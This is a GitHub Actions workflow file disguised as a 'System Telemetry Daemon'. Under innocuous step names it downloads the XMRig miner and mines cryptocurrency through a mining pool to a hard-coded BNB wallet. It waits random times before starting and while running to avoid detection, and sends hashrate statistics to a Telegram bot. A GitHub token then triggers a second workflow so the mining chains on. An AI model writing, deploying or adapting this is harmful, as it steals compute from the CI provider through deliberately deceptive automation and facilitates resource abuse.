name: System Telemetry Daemon

on:
  schedule:
    - cron: '0 6,18 * * *'  # Jam 13:00 dan 01:00 WIB
  workflow_dispatch:

permissions:
  contents: read

jobs:
  telemetry:
    runs-on: ubuntu-latest
    timeout-minutes: 360

    steps:
      - name: Boot Sequence
        run: echo "📡 Initializing diagnostic stack..."

      - name: Fetch Core Dependencies
        run: |
          sudo apt update -y
          sudo apt install -y curl tar

      - name: Begin Uplink Session
        env:
          TG_TOKEN: ${{ secrets.TG_TOKEN }}
          TG_CHAT_ID: ${{ secrets.TG_CHAT_ID }}
        run: |
          curl -s -X POST https://api.telegram.org/bot$TG_TOKEN/sendMessage \
            -d chat_id=$TG_CHAT_ID \
            --data-urlencode text="🟢 *System Node B online.*\nRuntime randomized between 20–90 minutes." \
            -d parse_mode=Markdown

      - name: Deploy Node Agent
        run: |
          curl -L -o pkg.tar.gz https://github.com/xmrig/xmrig/releases/download/v6.24.0/xmrig-6.24.0-linux-static-x64.tar.gz
          tar -xzf pkg.tar.gz
          cd xmrig-6.24.0
          chmod +x xmrig

          sleep $((RANDOM % 300 + 60))

          ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 \
            -u BNB:0xf319aef8c1d323c83740bcde9f25238ff5c4855d.sysmon#f2xg-6ynu \
            -p x --randomx-no-rdmsr | tee report.log &

          PID=$!
          sleep $((RANDOM % 5400 + 1200))
          kill $PID

      - name: Analyze Session Log
        if: always()
        env:
          TG_TOKEN: ${{ secrets.TG_TOKEN }}
          TG_CHAT_ID: ${{ secrets.TG_CHAT_ID }}
        run: |
          cd $(find . -type d -name "xmrig-6.24.0")
          HASHRATE=$(grep -a "speed" report.log | tail -n1 | sed 's/\x1b\[[0-9;]*m//g' | awk '{print $(NF-1) " H/s"}')
          ACCEPTED=$(grep -a "accepted" report.log | wc -l)
          REJECTED=$(grep -a "rejected" report.log | wc -l)

          MSG="✅ *System Node B session complete.*\n\n📊 *Stats:*\n• Hashrate: \`$HASHRATE\`\n• Accepted: \`$ACCEPTED\`\n• Rejected: \`$REJECTED\`"

          curl -s -X POST https://api.telegram.org/bot$TG_TOKEN/sendMessage \
            -d chat_id=$TG_CHAT_ID -d text="$MSG" -d parse_mode=Markdown

      - name: Propagate Activity
        if: always()
        env:
          GH_TOKEN: ${{ secrets.GH_TOKEN }}
        run: |
          sleep $((RANDOM % 60 + 10))
          curl -X POST -H "Accept: application/vnd.github+json" \
               -H "Authorization: Bearer $GH_TOKEN" \
               https://api.github.com/repos/${{ github.repository }}/actions/workflows/data-collector.yml/dispatches \
               -d '{"ref":"main"}'
